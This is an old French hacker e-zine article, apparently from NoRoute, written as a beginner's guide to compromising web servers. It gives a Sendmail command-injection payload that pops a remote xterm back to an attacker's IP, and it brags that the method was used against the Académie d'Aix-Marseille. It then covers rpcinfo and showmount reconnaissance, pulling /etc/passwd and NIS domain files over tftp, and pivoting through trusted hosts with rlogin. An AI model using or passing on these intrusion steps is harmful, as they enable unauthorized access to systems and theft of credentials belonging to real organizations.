----------------------------------------------------------------------------- (''''''''''''''''''') ( la bonne methode ) ( By CoD4 ) ( PhE! ) (___________________) 1: Introduction J'ai voulu faire se petit file pour tous ceux qui en ont marre de passer par PHF ou autre FTP writable :). C'est vrai que c'est le plus beau des bugs mais bon, ca va un moment ;). Ca va etre aussi un petit article bien sympa pour ceux qui debutent. 2: Let me play !!! Voila ca fait longtemps que vous reviez de vous faire ce putain de site ;) Bon, vous avez essaye le PHF mais il vous a gentiment dit qu'il etait pas la :) Mais oui, 'faut poa rever non plus... 3: De la methode Premier truc a faire: faites un tour par le Sendmail si vous avez droit a un sendmail bien pourri genre 4.x ou 5.x, vous pouvez surement executer des commandes par lui, exemple la methode qu'on a utilisé pour l'académie de Aix-Marseille :) mail from:"|xterm -display 123.123.123.123:0 & " rcpt to: nosay data . quit Hop! la, le sendmail va vous envoyer un zoli xterm :) 5: rpcinfo rpcinfo est ma commande preferée :) elle va nous en dire un peu plus sur le site. Lancez ca : rpcinfo -p www.bibi.org Hop! analysez bien tout ca :) regardez quel demon est present. Si il y a ypserv ben il y'a NIS, yeah! vous pouvez lire mon filez inclu ce mois-ci dans NoRoute :) on peut aussi voir si on as tftpboot ou bootparam (pour bootparam allez faire un tour dans filez sur NIS =) 6: tftp Ben la sa va etre cool :) essayez d'abord de choper le /etc/passwd. Si vous l'avez et qu'il est pas shadow, ben c'est kewl. mais il y'a de fortes chances k'il soit shadow :( bon si il y'a NIS vous pouvez quand meme recuperer le nom de domain NIS sans trop de bleme et piquer le /etc/netgroup. Dedans, vous avez le nom de domaine NIS a 90% de chances. 7: showmount Pareil, faites un 'chit showmount -e www.bibi.org et regardez si la machine fait confiance et surtout si elle exporte des repertoires a tout le monde, ce qui est interessant c'est de voir a qui la machine exporte ses reps car il est peut-etre plus facile de se faire l'autre machine pour ensuite revenir a l'autre (la tache sera plus facile car ils se font confiance :) 8: Conclusion N'oubliez pas qu'il sera souvent plus simple de se faire une machine totalement perdue dans le domaine de la victim ke de se faire directement le serveur WEB n'oubliez poa attaquez d'abord le plus faible :) puis ensuite propagez vous a grands coups de rlogin et spoofez le reseau jusqu'a arriver a votre cible ! Vous voyez que je ne parle de spoofing car en fait, il se trouve que je ne aucun log de spoof capable de faire du rlogin :'/ v0x est en train d'n developper un :) peut-etre dans le prochain NoRoute vous aurez un fabuleux spoofeur de rlogin :) Sinon, comme vous le voyez cette article est vraiment sans pretention. Je montre juste une methode qui me parait la plus valable. Si vous voulez en savoir plus, ben relisez le filez quee mikasoft et moi meme avons ecrit pour le #1 voila :) bye CoD4! (raah, t'ecris trop mal mon gars :)) -- hOtCodE) greetzZZ to : p4c3m4k3r voila un greetz rien ke pour lui :) ( on se comprends :)